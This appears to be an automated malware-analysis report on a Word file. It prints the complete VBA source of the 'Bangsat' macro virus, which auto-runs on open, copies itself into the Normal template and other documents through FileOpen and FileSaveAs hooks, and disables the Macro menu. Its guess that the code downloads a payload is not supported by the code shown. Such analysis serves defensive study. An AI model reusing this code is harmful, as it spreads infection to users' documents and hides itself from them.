MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
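The sample is a Microsoft Word document containing VBA macros. The presence of 'AutoOpen' and 'AutoExec' macros, along with the 'Bangsat' module name, strongly suggests the Bangsat malware family. The macros are designed to execute automatically when the document is opened, likely to download and execute a secondary payload or establish persistence. In the extracted source shown below, the routines copy the 'Bangsat' module between the active document and the Normal template, hook FileOpen and FileSaveAs to repeat that copy, disable the Tools > Macro menu entry, and write a comment into the document's summary information.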
Heuristics (3)
- VBA macros detected (medium, 1 related finding): OLE_VBA_MACROS. Document contains VBA macro code.
- AutoOpen macro (high): OLE_VBA_AUTOOPEN. AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium): OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7724 bytes | c0e22781cac433ac54361bf0fe8d228a95717970f880626df9ee9be45f5e8c80 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Bangsat"
' Bangsat
' version 1.0a
' release 1
' dated October 01, 2001
' origin PMKN, Malaysia
' created by (iB@, Evbat, ali) all are same person, different identity
' from the MVS Studio
' message -> Thanks for being something in my life...
' and to whom did assemble this macro, There You'll Be, I Know!
' drop me a line at macam_jarum@yahoo.com
Sub AutoExec()
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
BangsatSembunyi
End Sub
Sub AutoOpen()
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
SangatBangsat
End Sub
Function SangatBangsat()
On Error Resume Next
Dim MulaBangsat As String
If MacroContainer = NormalTemplate Then
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).CodeModule = "Bangsat" Then
GoTo DahKenaBangsat
Else
MulaBangsat = NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines)
ActiveDocument.VBProject.VBComponents.Add vbext_ct_StdModule
ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule.AddFromString MulaBangsat
ActiveDocument.VBProject.VBComponents.Item("Module1").Name = "Bangsat"
BangsatMenggatal
ActiveDocument.Save
End If
Next i
Else
MulaBangsat = ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines)
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Bangsat", 3
NormalTemplate.Save
End If
DahKenaBangsat:
End Function
Sub FileOpen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
SangatBangsat
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
End Sub
Function BangsatSembunyi()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
End Function
Function BangsatMenggatal()
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "Bangsat untuk kita menyukai orang, kemudian membencinya pula...macam_jarum@yahoo.com"
.Execute
End With
End Function
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
SangatBangsat
End Sub